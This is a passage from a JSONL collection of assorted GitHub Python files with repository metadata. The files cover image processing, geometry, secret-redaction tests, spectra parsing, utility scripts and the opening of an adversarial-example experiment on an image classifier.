(23).png')\r\nimgContour =img.copy()\r\nimgGray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\nimgBlur=cv2.GaussianBlur(imgGray,(7,7),2)\r\nimgCanny=cv2.Canny(imgBlur,130,130)\r\nimgBlank=np.zeros_like(img)\r\n\r\nimgTotal=cv2.hconcat([imgGray,imgBlur,imgCanny])\r\ncv2.imshow('Shapes',img)\r\ncv2.imshow('Shapes(Blur and Gray)',imgTotal)\r\n#cv2.imshow('Blank',imgBlank)\r\ngetContours(imgCanny)\r\ncv2.imshow('Contout Image :',imgContour)\r\n\r\n\r\n\r\ncv2.waitKey(0)","repo_name":"bhaskarjoshe/Learning-OpenCV","sub_path":"Chapter 8- Contours and Shape Detection.py","file_name":"Chapter 8- Contours and Shape Detection.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10515324738","text":"#!/usr/bin/python\n\nimport sys\n\nif len(sys.argv) != 4:\n print(\"Usage\\n%s block %s-p2p.txt p2p-doc.txt\" % sys.argv[0])\n sys.exit(0)\n\ndef pnodes(n):\n nn = n.split(\":\")\n p1 = nn[0].split(\".\")\n p2 = ['PNONE'] if len(nn) == 1 else nn[1].split(\".\")\n return { 'b':p1[0], 'x':int(p1[1]), 'y':int(p1[2]), 'i':(-1 if len(p1) < 4 else int(p1[3])), 'p':p2[0], 'ip':(-1 if len(p2) < 2 else int(p2[1])) }\n\n\nblock = sys.argv[1].upper()\n\nport = {}\nfor die in ['e50f', 'gx25f', 'gt75f', 'gt150f', 'gt300f', 'sx50f', 'sx120f']:\n for l in open(sys.argv[2] % die):\n ls = l.rstrip('\\n\\r').split()\n s = pnodes(ls[0])\n d = pnodes(ls[1])\n if s['b'] != block and d['b'] != block:\n continue\n if s['b'] == block:\n n1 = s\n n2 = d\n s2d = True\n else:\n n1 = d\n n2 = s\n s2d = False\n \n a = None\n if n1['p'] not in port:\n a = {}\n port[n1['p']] = a\n else:\n a = port[n1['p']]\n dkey = n2['b'] + ':' + n2['p'] if n2['p'] != 'PNONE' else n2['b']\n if dkey not in a:\n a[dkey] = [[n1['i']], [n1['ip']], s2d]\n else:\n if n1['i'] not in a[dkey][0]:\n a[dkey][0].append(n1['i'])\n if n1['ip'] not in a[dkey][1]:\n a[dkey][1].append(n1['ip'])\n\ndocs = {}\nfor l in open(sys.argv[3]):\n ls = l.rstrip('\\n\\r').split(maxsplit=1)\n if len(ls) == 0:\n continue\n docs[ls[0].upper()] = ls[1] if len(ls) >= 2 else \"\"\n\ndef mkinst(gl):\n vals = ''\n if len(gl) != 1 or gl[0] != -1:\n s = None\n e = None\n for vv in sorted(gl):\n assert(vv != -1)\n if e == None or vv != e+1:\n if s != None:\n if vals != '':\n vals += ', '\n if s != e:\n vals += \"%d-%d\" % (s, e)\n else:\n vals += \"%d\" % s\n s = vv\n e = vv\n else:\n e = vv\n if vals != '':\n vals += ', '\n if s != e:\n vals += \"%d-%d\" % (s, e)\n else:\n vals += \"%d\" % s\n return vals\n\nentries = []\nhead = [\"Port Name\", \"Instance\", \"Port bits\", \"Dir\", \"Remote port\", \"Documentation\" ]\nfor p,g in port.items():\n for gg,gl in g.items():\n\n binst = mkinst(gl[0])\n pinst = mkinst(gl[1])\n dd = '>' if gl[2] else '<'\n key = block + ':' + p + '_' + gg if gl[2] else gg + '_' + block + ':' + p\n doc = 'TODO' if key not in docs else docs[key]\n entries.append([\"\" if p == 'PNONE' else p, binst, pinst, dd, gg, doc])\n\nentries.sort(key = lambda e: [e[0], e[3], e[4]])\n\ncsize = []\nfor e in head:\n csize.append(len(e))\nfor e in entries:\n for i in range(len(head)):\n csize[i] = max(csize[i], len(e[i]))\n\nsep = '+'\nseph = '+'\nfor i in range(len(head)):\n sep += '-' * (csize[i] + 2)\n seph += '=' * (csize[i] + 2)\n sep += '+'\n seph += '+'\n\nprint(sep)\ns = '|'\nfor i in range(len(head)):\n s += ' %*s |' % (csize[i], head[i])\nprint(s)\nprint(seph)\nfor e in entries:\n s = '|'\n for i in range(len(head)):\n s += ' %*s |' % (csize[i], e[i])\n print(s)\n print(sep)\n\n","repo_name":"Ravenslofty/mistral","sub_path":"docs/mkp2pdoc.py","file_name":"mkp2pdoc.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"67"} +{"seq_id":"18652668887","text":"import sys\nimport math\nimport numpy as np\nfrom scipy.spatial import ConvexHull\n\n# ################################################# #\n# ##### UTILS ##### #\n# ################################################# #\nepsilon = 1E-9\n\ndef value(x):\n \"\"\"Returns 0 if x is 'sufficiently close' to zero, +/- 1E-9\"\"\"\n if x >= 0 and x <= epsilon:\n return 0\n if x < 0 and -x <= epsilon:\n return 0\n return x\n\ndef intersect(x1, y1, x2, y2, x3, y3, x4, y4):\n \"\"\"\n Return the point of intersection (or None) between edges:\n e1: (x1,y1) - (x2,y2)\n e2: (x3,y3) - (x4,y4)\n Might include end-points.\n \"\"\"\n # common denominator\n da = (y4 - y3)*(x2 - x1)\n db = (x4 - x3)*(y2 - y1)\n denom = da - db\n \n if value(denom) == 0:\n return None # PARALLEL OR COINCIDENT\n \n # numerators\n ux = (x4-x3)*(y1-y3) - (y4-y3)*(x1-x3)\n uy = (x2-x1)*(y1-y3) - (y2-y1)*(x1-x3)\n \n ux = ux / denom\n uy = uy / denom\n \n # line segment intersections are between 0 and 1. Both must be true\n # Special care on both boundaries w/ floating point issues.\n if value(ux) >= 0 and value(ux-1) <= 0 and value(uy) >= 0 and value(uy-1) <= 0:\n ix = x1 + ux * (x2-x1)\n iy = y1 + ux * (y2-y1)\n return (ix, iy)\n \n return None # no intersection\n\ndef computeAngleSign(x1, y1, x2, y2, x3, y3):\n \"\"\"\n Determine if angle (p1,p2,p3) is right or left turn by computing\n 3x3 determinant. If sign is + if p1-p2-p3 forms counterclockwise\n triangle. So if positive, then left turn. If zero then colinear.\n If negative, then right turn.\n \"\"\"\n val1 = (x2 - x1)*(y3 - y1)\n val2 = (y2 - y1)*(x3 - x1)\n diff = value(val1 - val2)\n if diff > 0:\n return +1\n elif diff < 0:\n return -1\n else:\n return 0\n\ndef inhalfplane(pt, q):\n \"\"\"Return True if point pt is in half-plane defined by q.\"\"\"\n signTail = computeAngleSign(pt.x(), pt.y(),\n q.head().x(), q.head().y(),\n q.tail().x(), q.tail().y())\n return signTail >= 0\n\ndef dist(p, q):\n \"\"\"Compute Euclidean distance between two points.\"\"\"\n return math.sqrt((p.x()-q.x())**2 + (p.y()-q.y())**2)\n\ndef aim (p, q):\n \"\"\"Return true if p is \"aiming towards\" q's half-plane edge.\"\"\"\n # First check if p.tail is in the half-plane of q\n inside = inhalfplane(p.tail(), q)\n\n # compute cross product of q x p to determine orientation\n # en.wikipedia.org/wiki/Cross_product#Computational_geometry\n # normalize p and q\n pnorm = Point(p.tail().x() - p.head().x(), \n p.tail().y() - p.head().y())\n qnorm = Point(q.tail().x() - q.head().x(), \n q.tail().y() - q.head().y())\n\n cross = qnorm.x()*pnorm.y() - qnorm.y()*pnorm.x()\n if inside:\n # in half-plane, so now check orientation\n return cross < 0\n else:\n # not in half-plane.\n return cross >= 0\n\ndef containedWithin(pt, p):\n \"\"\"\n Determine if pt is fully contained within p. Do so by \n summing angles with each edge in the convex polygon p.\n \"\"\"\n sum = 0\n for e in p.edges():\n C = dist(e.head(), e.tail())\n A = dist(pt, e.head())\n B = dist(pt, e.tail())\n sum += math.degrees(math.acos((A*A+B*B-C*C)/(2*A*B)))\n return value(sum-360) == 0\n\ndef convexIntersect(p, q):\n \"\"\"\n Compute and return polygon resulting from the intersection of\n two convext polygons, p and q.\n \"\"\"\n intersection = Polygon()\n pn = p.numEdges()\n qn = q.numEdges()\n k = 1\n inside = None # can't know inside until intersection\n first = None # remember 1st intersection to know when to stop\n firstp = pe = p.edges()[0] # get first edge of p and q\n firstq = qe = q.edges()[0]\n while k < 2 * (pn + qn):\n pt = pe.intersect(qe)\n if pt is not None:\n if first == None:\n first = pt\n elif pt == first:\n # stop when find first intersection again\n break\n\n intersection.add(pt.x(), pt.y())\n if inhalfplane(pe.tail(), qe):\n inside = p\n else:\n inside = q\n\n # Identify relationship between edges; either we advance\n # p or we advance q, based on whether p's current edge\n # is aiming at qe (or vice versa).\n advancep = advanceq = False\n\n if (aim(pe,qe) and aim(qe,pe)) or (not aim(pe,qe) and not aim(qe,pe)):\n if inside is p:\n advanceq = True\n elif inside is q:\n advancep = True\n else:\n # no intersection yet. Choose based on\n # which one is \"outside\"\n if inhalfplane(pe.tail(), qe):\n advanceq = True\n else:\n advancep = True\n elif aim(pe, qe):\n advancep = True\n elif aim(qe, pe):\n advanceq = True\n\n if advancep:\n if inside is p:\n intersection.add(pe.tail().x(), pe.tail().y())\n pe = pe.next()\n elif advanceq:\n if inside is q:\n intersection.add(qe.tail().x(), qe.tail().y())\n qe = qe.next()\n\n k += 1\n \n if intersection.numPoints() == 0:\n if containedWithin(firstp.tail(), q):\n return p\n elif containedWithin(firstq.tail(), p):\n return q\n else:\n return None\n\n # Return computed intersection\n return intersection\n\n# ################################################# #\n# ##### POINT ##### #\n# ################################################# #\n\nclass Point:\n \"\"\"Represents a point in Cartesian space.\"\"\"\n\n def __init__(self, x, y):\n \"\"\"Creates a point (x,y) in Cartesian space.\"\"\"\n self._x = x\n self._y = y\n\n def copy(self):\n \"\"\"Return copy of a point.\"\"\"\n return Point(self._x, self._y)\n\n def x(self):\n \"\"\"Return x value of point.\"\"\"\n return self._x\n\n def y(self):\n \"\"\"Return y value of point.\"\"\"\n return self._y\n\n# ################################################ #\n# ##### EDGE ##### #\n# ################################################ #\n\nclass Edge:\n \"\"\"Represents an edge in Cartesian space.\"\"\"\n\n def __init__(self, head, tail):\n \"\"\"\n Creates an edge for consecutive points head and tail.\n It is assumed that head != tail\n \"\"\"\n if head == tail:\n raise ValueError(\"Can't create edge from two identical points\")\n self._head = head\n self._tail = tail\n self._next = None\n\n def head(self):\n \"\"\"Return head value of edge.\"\"\"\n return self._head\n\n def tail(self):\n \"\"\"Return tail value of edge.\"\"\"\n return self._tail\n\n def next(self):\n \"\"\"Return next edge in polygon.\"\"\"\n return self._next\n \n def setNext(self, e):\n \"\"\"Make 'e' the next edge in polygon after self.\"\"\"\n self._next = e\n\n def intersect(self, e):\n \"\"\"Return intersection between two edges (aside from end-points).\"\"\"\n if self.head() == e.head() or self.head() == e.tail():\n return None\n if self.tail() == e.head() or self.tail() == e.tail():\n return None\n\n # compute intersection of two line segments using x,y coords\n pt = intersect(self.head().x(),\n self.head().y(),\n self.tail().x(),\n self.tail().y(),\n e.head().x(),\n e.head().y(),\n e.tail().x(),\n e.tail().y())\n if pt is None:\n return None\n return Point (pt[0], pt[1])\n\n# ################################################# #\n# ##### POLYGON ##### #\n# ################################################# #\n\nclass Polygon:\n \"\"\"Represents polygon of points in Cartesian space.\"\"\"\n\n def __init__(self, pts=[]):\n \"\"\"\n Creates polygon from list of points. If omitted, polygon is empty.\n \"\"\"\n self.points = []\n for pt in pts:\n self.points.append(pt.copy())\n\n def valid(self):\n \"\"\"A polygon becomes valid with three or more points.\"\"\"\n return len(self.points) >= 3\n\n def numEdges(self):\n \"\"\"Return the number of edges in polygon.\"\"\"\n if len(self.points) < 1:\n return 0\n elif len(self.points) == 2:\n return 1\n else:\n return len(self.points)\n\n def edges(self):\n \"\"\"Return edges in the polygon, in order.\"\"\"\n order = []\n for i in range(0, len(self.points)-1):\n order.append(Edge(self.points[i], self.points[i+1]))\n\n if self.valid():\n n = len(self.points)\n order.append(Edge(self.points[n-1], self.points[0]))\n\n # Now link edges to next one in the chain. Make sure to\n # link back to start\n for i in range(len(order)-1):\n order[i].setNext(order[i+1])\n order[-1].setNext(order[0])\n return order\n\n def numPoints(self):\n \"\"\"Return the number of points in polygon.\"\"\"\n return len(self.points)\n\n def add(self, x, y):\n \"\"\"Extend polygon with additional (x,y) point.\"\"\"\n self.points.append(Point(x,y))\n n = len(self.points)\n\n def make_convex(self):\n pts = []\n for pt in self.points:\n pts.append((pt.x(), pt.y()))\n pts = np.array(pts)\n pts = pts[ConvexHull(pts).vertices]\n print(*pts, file=sys.stderr)\n\n self.points = [Point(x, y) for (x,y) in pts]\n\n def area(self): \n \"\"\"Return the area of the polygon.\"\"\"\n area = 0\n q = self.points[-1]\n for p in self.points:\n area += p.x() * q.y() - p.y() * q.x()\n q = p\n return area / 2\n\n# ################################################ #\n# ##### MAIN ##### #\n# ################################################ #\n\nif __name__ == '__main__':\n n = int(input())\n m = int(input())\n\n p = []\n for i in range(n):\n x, y = map(int, input().split())\n p.append((x, y))\n p = np.array(p)\n p = p[ConvexHull(p).vertices]\n print(\"Pol1:\", *p, file=sys.stderr)\n\n q = []\n for i in range(m):\n x, y = map(int, input().split())\n q.append((x, y))\n q = np.array(q)\n q = q[ConvexHull(q).vertices]\n print(\"Pol2:\", *q, file=sys.stderr)\n\n inter = convexIntersect(Polygon([Point(x, y) for (x,y) in p]),\n Polygon([Point(x, y) for (x,y) in q]))\n\n if inter:\n inter.make_convex()\n area_f = abs(inter.area())\n print(area_f, file=sys.stderr)\n\n area_i = int(area_f)\n print(area_i + (area_i != area_f))\n else:\n print(0)","repo_name":"JujuDel/CodinGame","sub_path":"Puzzles/Hard/encounterSurface.py","file_name":"encounterSurface.py","file_ext":"py","file_size_in_byte":11104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8812210283","text":"from schemachange.cli import SecretManager\n\n\n##### test Class #####\ndef test_SecretManager_given_no_secrets_when_redact_then_return_original_value():\n sm = SecretManager()\n result = sm.redact(\"My string\")\n assert result == \"My string\"\n\n\ndef test_SecretManager_given_secrets_when_redact_on_none_then_return_none():\n sm = SecretManager()\n sm.add(\"world\")\n result = sm.redact(None)\n assert result is None\n\n\ndef test_SecretManager_given_secrets_when_redact_then_return_redacted_value():\n sm = SecretManager()\n sm.add(\"world\")\n result = sm.redact(\"Hello world!\")\n assert result == \"Hello *****!\"\n\n\ndef test_SecretManager_given_secrets_when_clear_then_should_hold_zero_secrets():\n sm = SecretManager()\n sm.add(\"world\")\n sm.add(\"Hello\")\n\n # check private variable\n assert len(sm._SecretManager__secrets) == 2\n\n sm.clear()\n\n # check private variable\n assert len(sm._SecretManager__secrets) == 0\n\n\ndef test_SecretManager_given_one_secrets_when_add_range_with_None_then_Count_should_remain_one():\n sm = SecretManager()\n sm.add(\"world\")\n sm.add_range(None)\n\n assert len(sm._SecretManager__secrets) == 1\n\ndef test_SecretManager_given_one_secrets_when_add_range_with_empty_set_then_Count_should_remain_one():\n sm = SecretManager()\n sm.add(\"world\")\n\n range = set()\n sm.add_range(range)\n\n assert len(sm._SecretManager__secrets) == 1\n\ndef test_SecretManager_given_one_secrets_when_add_range_with_two_secrets_then_count_of_secrets_three():\n sm = SecretManager()\n sm.add(\"world\")\n\n range = {\"one\", \"two\"}\n sm.add_range(range)\n\n # check private variable\n assert len(sm._SecretManager__secrets) == 3\n assert \"world\" in sm._SecretManager__secrets\n assert \"one\" in sm._SecretManager__secrets\n assert \"two\" in sm._SecretManager__secrets\n\n\n##### test static methods #####\n\ndef test_SecretManager_check_global_assignment_round_trip():\n sm = SecretManager()\n\n SecretManager.set_global_manager(sm)\n assert SecretManager.get_global_manager() is sm\n\n\ndef test_SecretManager_global_redact():\n sm = SecretManager()\n sm.add(\"Hello\")\n SecretManager.set_global_manager(sm)\n\n assert SecretManager.global_redact(\"Hello World!\") == \"***** World!\"\n","repo_name":"Snowflake-Labs/schemachange","sub_path":"tests/test_SecretManager.py","file_name":"test_SecretManager.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"67"} +{"seq_id":"14382600486","text":"class User(UserMixin, db.Model):\n # ...\n def to_json(self):\n json_user = {\n 'url': url_for('api.get_post', id=self.id, _external=True),\n 'username': self.username,\n 'member_since': self.member_since,\n 'last_seen': self.last_seen,\n 'posts': url_for('api.get_user_posts', id=self.id, _external=True),\n 'followed_posts': url_for('api.get_user_followed_posts',\n id=self.id, _external=True),\n 'post_count': self.posts.count()\n }\n return json_user","repo_name":"anaf007/book","sub_path":"source/book/python_book/flask_web_development/code/code14-5.py","file_name":"code14-5.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"19007111296","text":"import sys, string\n\n\ndef readStringMGF(peaksFile, scanID):\n protonMass = 1.00728\n peaks = {}\n peaksnIntensity = {}\n pepMasses = {}\n retention = -1\n charges = {}\n n = -1\n retentions = {}\n specLines = {}\n fileLines = {}\n # Reading the peaks and intensities.\n alllines = peaksFile.split(\"\\n\")\n pointer = 0\n allSpectraVector = {}\n while pointer < len(alllines):\n # line = peaksFile.readline()\n line = alllines[pointer]\n if line != \"BEGIN IONS\":\n pointer += 1\n continue\n originalLine = line\n line = line.strip()\n if line == \"BEGIN IONS\":\n # initiate an array with 2,000,000 entires of 0\n spectrumVector = [0] * 2000000\n intensityVector = [0] * 2000000\n specLines = [originalLine + \"\\n\"]\n peptide = \"\"\n stop = False\n while (True):\n pointer += 1\n if pointer == len(alllines):\n stop = True\n break\n line = alllines[pointer]\n if not line:\n continue\n # line = peaksFile.readline()\n if not line[0].isdigit():\n specLines.append(line + \"\\n\")\n if line[0:6] == \"CHARGE\":\n charge = int(''.join(c for c in line.split(\"=\")[1] if c.isdigit()))\n if line[0:6] == \"PEPMAS\":\n pepMass = float(line.strip().split()[0][8:])\n if line[0:5] == \"DBID=\":\n line = line.strip()\n if line[5:] != \"\":\n antimartin = line[15:]\n if \"TITLE=\" in line:\n peptide = line.strip().split(\"=\")[1]\n if \"RTINSECONDS\" in line:\n retention = line.split(\"=\")[1].strip()\n else:\n break\n n += 1\n # if peptide == \"\":\n # \tpeptide=str(n)\n peptide = str(scanID)\n # peptide = \"ion\" + \"_\"+str(n)\n retentions[peptide] = retention\n peaksnIntensity[peptide] = {}\n charges[peptide] = charge\n pepMasses[peptide] = pepMass\n # charge1PepMass = int(round((2 * pepMass) - protonMass, 3) * 1000)\n # if charge1PepMass < 550 or charge1PepMass > 1800:\n # continue\n if stop:\n continue\n pointer2 = 0\n while \"END IONS\" not in line:\n specLines.append(line.strip() + \"\\n\")\n peakLine = line.strip().split()\n peakMass = round(float(peakLine[0]), 3)\n intensity = float(peakLine[1])\n if intensity == 0:\n pointer += 1\n line = alllines[pointer].strip()\n continue\n # intensity =1\n peaksnIntensity[peptide][peakMass] = intensity\n if charge == 1:\n pointer2 = int(round(peakMass, 3) * 1000)\n if pointer2 < 2000001:\n spectrumVector[pointer2] = intensity\n # intensityVector[round(peakMass,3)] = 1\n elif charge == 2:\n charge1PeakMass = int(round((2 * peakMass) - protonMass, 3) * 1000)\n # peaksnIntensity[peptide][charge1PeakMass]=intensity\n if charge1PeakMass < 2000001:\n spectrumVector[charge1PeakMass] = intensity\n # spectrumVector[int(round(peakMass,3)*1000)] = intensity\n pointer += 1\n line = alllines[pointer].strip()\n\n if \"END IONS\" in line:\n allSpectraVector[peptide] = spectrumVector\n specLines.append(line + \"\\n\")\n fileLines[peptide] = specLines\n continue\n\n return peaksnIntensity, pepMasses, charges, retentions, fileLines, allSpectraVector\n","repo_name":"bbehsaz/cyclonovo_dev","sub_path":"scripts/read_string_split_mgf_vectored.py","file_name":"read_string_split_mgf_vectored.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6907058269","text":"#!/usr/bin/env python3\n\nimport json\nimport os\nfrom datetime import datetime, timedelta\n\npath = os.environ['HOME'] + '/Dropbox/.taskbook/storage/storage.json'\nfile = open(path, 'r')\ndata = json.loads(file.read())\n\n\ndef time_ago(date):\n date_fmt = '%Y%m%d %H%M%S'\n date = datetime.strptime(date.strftime(date_fmt), date_fmt)\n today = datetime.strptime(datetime.now().strftime(date_fmt), date_fmt)\n time_ago = today - date\n days, hours = time_ago.days, time_ago.seconds // 3600\n return days, hours\n\n\nboards = []\nboards.extend([v['boards'][0] for _, v in data.items() if v['boards'][0] not in boards])\nboards = sorted(set(boards))\n\nboards_count = 0\ntasks_count = 0\nfor board in boards:\n tasks_count = 0\n if boards_count < 4:\n print('${font Iosevka:bold:italic:size=12}' + '${color9}' + f'\\n{board}'.replace('@','') + '${color}' + '${font}')\n boards_count += 1\n for _, v in data.items():\n date = datetime.fromtimestamp(int(v['_timestamp']) / 1000)\n days, hours = time_ago(date)\n days_ago = (\n '${color3}' + f'{days}d {hours}h' + '${color}'\n if days > 0\n else '${color3}today${color}'\n )\n if tasks_count < 2:\n if v['boards'][0] == board:\n is_starred = '${color3}六${color}' if v['isStarred'] else ''\n if v['_isTask']:\n if not v['isComplete']:\n if not v['inProgress']:\n print(\n f' {v[\"_id\"]:02}. '\n + '${color1}${color} '\n #+ f'{v[\"description\"]} {days_ago} {is_starred}'\n + f'{v[\"description\"]} {is_starred}'\n )\n if v['inProgress']:\n print(\n f' {v[\"_id\"]:02}. '\n + '${color4}${color} '\n #+ f'{v[\"description\"]} {days_ago} {is_starred}'\n + f'{v[\"description\"]} {is_starred}'\n )\n tasks_count += 1\nfile.close()\n","repo_name":"jhilker98/regolith-dotfiles","sub_path":".config/conky/scripts/taskbook.py","file_name":"taskbook.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15495493835","text":"import datetime\n\ndef day_to_suffix(day):\n day=int(day)\n if day==1:\n return '1st'\n elif day==2:\n return '2nd'\n elif day==3:\n return '3rd'\n else:\n return str(day)+'th'\n\ndef date_to_text(a,b):\n if (not math.isnan(b)) :\n date_from=a.split('/')\n date_to=b.split('/')\n date_from = datetime.datetime(int(date_from[2])+2000,int(date_from[1]),int(date_from[0]))\n date_to = datetime.datetime(int(date_to[2])+2000,int(date_to[1]),int(date_to[0]))\n string = 'from ' + day_to_suffix(date_from.strftime(\"%d\")) + ' ' + date_from.strftime(\"%B\") + ' ' + date_from.strftime(\"%Y\") + ' to '+ day_to_suffix(date_to.strftime(\"%d\")) + ' ' + date_to.strftime(\"%B\")+' '+date_to.strftime(\"%Y\")\n else:\n date=a.split('/')\n date = datetime.datetime(int(date[2])+2000,int(date[1]),int(date[0]))\n string = 'on' + ' '+ day_to_suffix(date.strftime(\"%d\")) + ' ' + date.strftime(\"%B\") + ' ' + date.strftime(\"%Y\")\n return string\n \n\n","repo_name":"PetrichorIITPkd/Certificates-Maker","sub_path":"Core Data/TESTING/Date_Converter.py","file_name":"Date_Converter.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3732637550","text":"import os\n\nfrom lark import Lark\n\ngrammar = open(os.path.join(os.path.dirname(__file__), \"json.lark\"), \"r\").read()\nparser = Lark(grammar, start=\"value\")\n\n\ndef test_example_json():\n json = \"\"\"\n {\n \"key\": [\"item0\", \"item1\", 3.14,\n { \"foo\": \"bar\", \"bar\": 123 }],\n \"one\": { \"two\": { \"three\": 3 } },\n \"empty object\": {},\n \"empty list\": []\n }\n \"\"\"\n\n ast = parser.parse(json)\n assert ast\n\n\ndef test_package_json():\n json = open(os.path.join(os.path.dirname(__file__), \"../package.json\"), \"r\").read()\n\n ast = parser.parse(json)\n assert ast\n","repo_name":"lucassus/lucky-script","sub_path":"lark-sandbox/json_test.py","file_name":"json_test.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27367160539","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 28 22:37:23 2022\n\n@author: yehuh\n\"\"\"\n\nimport os\n\n# Absolute path of a file\ndata_path = \"./Test/\"\n\n\ndirs = os.listdir(data_path)\n\n\nfor label in dirs:\n path = os.path.join(data_path, label)\n #print(path)\n imgs = os.listdir(path)\n for img in imgs:\n #print(img)\n if \"火狐截图\" in img:\n new_lab = img.replace(\"火狐截图\",\"\")\n #print(new_lab)\n new_path = os.path.join(path,new_lab)\n #print(new_path)\n old_path = os.path.join(path,img)\n #print(old_path)\n os.rename(old_path, new_path)\n #path = os.path.join(path, img)\n #imgs = os.listdir(path)\n '''\n for img in imgs:\n \n\n'''\n#old_name = r\"E:\\demos\\files\\reports\\details.txt\"\n#new_name = r\"E:\\demos\\files\\reports\\new_details.txt\"\n\n# Renaming the file\n#os.rename(old_name, new_name)","repo_name":"yehuh/ImageRecognizer","sub_path":"fileRename.py","file_name":"fileRename.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39626168352","text":"import yaml\n\n\nclass ConfigReader():\n file_path = \"\"\n\n def __init__(self, file_path):\n self.file_path = file_path\n \n def read_config(self):\n result = {}\n with open(self.file_path) as config:\n result = yaml.safe_load(config)\n return result\n\n\nif __name__ == \"__main__\":\n c = ConfigReader(\"./config.yaml\")\n print(c.read_config())\n\n","repo_name":"Haotian9850/cloud-service-benchmarker","sub_path":"parbenchmarker/ConfigReader.py","file_name":"ConfigReader.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"13718872498","text":"class Solution(object):\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n num1 = num1[::-1]; num2 = num2[::-1]\n arr = [0 for i in range(len(num1)+len(num2))]\n for i in range(len(num1)):\n for j in range(len(num2)):\n arr[i+j] += int(num1[i]) * int(num2[j])\n ans = []\n for i in range(len(arr)):\n digit = arr[i] % 10\n carry = arr[i] / 10\n if i < len(arr)-1:\n arr[i+1] += carry\n ans.insert(0, str(digit))\n while ans[0] == '0' and len(ans) > 1:\n del ans[0]\n return ''.join(ans)","repo_name":"Mr-Phoebe/ACM-ICPC","sub_path":"OJ/Leetcode/Algorithm/43. Multiply Strings.py","file_name":"43. Multiply Strings.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"} +{"seq_id":"12341810533","text":"from chispa import assert_df_equality\n\nfrom cishouseholds.impute import impute_outside_uk_columns\n\n\ndef test_impute_outside_uk_columns(spark_session):\n input_df = spark_session.createDataFrame(\n data=[\n (\"2010/11/11\", \"France\", \"Yes\", \"2022/01/01\", 0),\n (None, \"France\", None, \"2022/01/01\", 1),\n (\"2020/05/21\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2010/05/27\", \"France\", \"No\", \"2022/01/01\", 1),\n (\"2021/07/20\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2010/08/13\", \"France\", \"No\", \"2022/01/01\", 1),\n ],\n schema=\"outside_uk_date_column string, outside_country_column string, outside_uk_since_column string, visit_datetime_column string, id_column integer\",\n )\n\n expected_df = spark_session.createDataFrame(\n data=[\n (None, \"France\", None, \"2022/01/01\", 1),\n (\"2020/05/21\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2020/05/21\", \"France\", \"No\", \"2022/01/01\", 1),\n (\"2021/07/20\", \"France\", \"Yes\", \"2022/01/01\", 1),\n (\"2021/07/20\", \"France\", \"No\", \"2022/01/01\", 1),\n (None, \"France\", \"No\", \"2022/01/01\", 0),\n ],\n schema=\"outside_uk_date_column string, outside_country_column string, outside_uk_since_column string, visit_datetime_column string, id_column integer\",\n )\n\n actual_df = impute_outside_uk_columns(\n input_df,\n outside_country_column=\"outside_country_column\",\n outside_uk_date_column=\"outside_uk_date_column\",\n outside_uk_since_column=\"outside_uk_since_column\",\n visit_datetime_column=\"visit_datetime_column\",\n id_column=\"id_column\",\n )\n assert_df_equality(actual_df, expected_df, ignore_row_order=True, ignore_column_order=True)\n","repo_name":"ONSdigital/cis_households","sub_path":"tests/impute/test_impute_outside_uk_columns.py","file_name":"test_impute_outside_uk_columns.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"74974455574","text":"from __future__ import print_function\r\n\r\nimport copy\r\nfrom sklearn.metrics import f1_score\r\nimport torch\r\nimport torch.nn as nn\r\nimport xlwt\r\n\r\nimport os\r\nimport re\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nfrom utils.utils import get_top_grad_index\r\n\r\n\r\n\r\n\r\npoint_dict = {}\r\n\r\n\r\n\r\n\r\ndef solve_input(raw_path):\r\n x = np.load(raw_path)\r\n x = x.astype(\"float32\")\r\n x = x/255\r\n X = torch.tensor(x)\r\n X = torch.unsqueeze(X,0)\r\n X.requires_grad = True\r\n return X\r\n\r\ncross_loss = nn.CrossEntropyLoss()\r\n#label:int\r\ndef one_file_test(model,data, X,label,iters = 100,alpha=8,num=15,flag=1):\r\n it = 0\r\n new = label\r\n\r\n one_hot_label = torch.nn.functional.one_hot(torch.tensor(label), num_classes= 10)\r\n decay = 0.2\r\n momentum = torch.zeros_like(data)\r\n while(new==label and it15):\r\n break\r\n print(\"done!\")\r\n\r\n\r\ndef statistic_fields(raw_path,num=15):\r\n print(\"------------------statistic_fields-----------------\")\r\n model = torch.load('../train_model/model.pkl')\r\n label_result={}\r\n patten = '[a-zA-Z]+'\r\n book = xlwt.Workbook(encoding='utf-8', style_compression=0)\r\n for file in 